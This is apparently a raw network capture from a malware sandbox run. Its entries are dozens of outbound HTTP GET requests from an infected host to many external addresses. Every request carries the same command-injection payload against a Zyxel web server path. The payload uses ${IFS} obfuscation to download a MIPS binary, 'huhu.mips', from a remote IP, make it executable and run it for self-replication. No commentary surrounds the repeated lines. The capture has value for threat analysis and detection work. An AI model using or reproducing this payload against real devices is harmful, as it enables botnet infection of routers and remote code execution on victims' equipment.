                                              Jan 29, 2024 07:03:53.069020987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5063192.168.2.1437948101.219.130.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069046974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5064192.168.2.144884863.89.176.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069096088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5065192.168.2.1442832134.140.227.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069152117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5066192.168.2.144326647.66.107.139443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069185972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5067192.168.2.1446528154.81.115.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069233894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5068192.168.2.1454044213.106.220.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069263935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5069192.168.2.143968417.166.126.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069304943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5070192.168.2.143436479.99.20.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069346905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5071192.168.2.1459596159.149.206.24443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069380999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5072192.168.2.1447450131.250.36.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069430113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5073192.168.2.1454156139.43.134.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069468021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5074192.168.2.1456528210.164.206.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069520950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5075192.168.2.1434742219.4.49.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069567919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5076192.168.2.14432501.22.81.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069591999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5077192.168.2.143990287.67.249.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069618940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5078192.168.2.1446312147.176.169.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069700956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5079192.168.2.1446510131.127.158.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069731951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5080192.168.2.1459084114.7.154.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069770098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5081192.168.2.143481289.243.96.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069814920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5082192.168.2.1439358187.59.239.164443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069865942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5083192.168.2.1447588153.167.125.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069900036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5084192.168.2.1442130105.86.244.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069924116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5085192.168.2.1452300187.250.82.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069951057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5086192.168.2.1444786146.132.111.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.069987059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5087192.168.2.144554897.8.132.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070054054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5088192.168.2.1446238195.179.39.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070079088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5089192.168.2.145386446.77.141.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070125103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5090192.168.2.1447746206.28.100.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070154905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5091192.168.2.1444490136.100.200.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070198059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5092192.168.2.1450088124.175.134.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070240021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5093192.168.2.1444892163.16.180.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070269108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5094192.168.2.1451022166.24.220.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070321083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5095192.168.2.1457724167.249.12.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070359945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5096192.168.2.1447788198.216.179.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070416927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5097192.168.2.144370220.103.54.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070440054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5098192.168.2.144692852.246.255.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070496082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5099192.168.2.1437264153.6.156.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070549965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5100192.168.2.1450044131.34.225.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070563078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5101192.168.2.144451047.235.207.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070591927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5102192.168.2.144922490.222.129.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070621014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5103192.168.2.1447862163.174.141.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070671082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5104192.168.2.1440786132.34.67.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070708036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5105192.168.2.1446848218.128.161.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070746899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5106192.168.2.145112844.26.189.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070770979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5107192.168.2.145438042.253.84.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070842981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5108192.168.2.143783246.149.182.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070863008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5109192.168.2.1460948197.5.234.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070894003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5110192.168.2.1448522110.115.184.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070913076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5111192.168.2.1438878129.138.17.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.070954084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5112192.168.2.143682246.15.93.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071003914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5113192.168.2.14606045.167.181.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071047068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5114192.168.2.1437102166.164.206.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071082115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5115192.168.2.1438798201.176.200.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071120024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5116192.168.2.1443282193.191.24.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071170092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5117192.168.2.1443120143.93.176.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071191072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5118192.168.2.1441232176.139.68.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071240902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5119192.168.2.145774034.57.192.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071270943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5120192.168.2.145959820.144.160.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071322918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5121192.168.2.1447902165.2.212.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071373940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5122192.168.2.1432804115.77.185.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071393967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5123192.168.2.1456530158.174.200.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071435928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5124192.168.2.1453932161.249.154.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071469069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5125192.168.2.1447434138.142.191.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:53.071505070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5126192.168.2.145724419.97.164.131443
                                              TimestampBytes transferredDirectionData
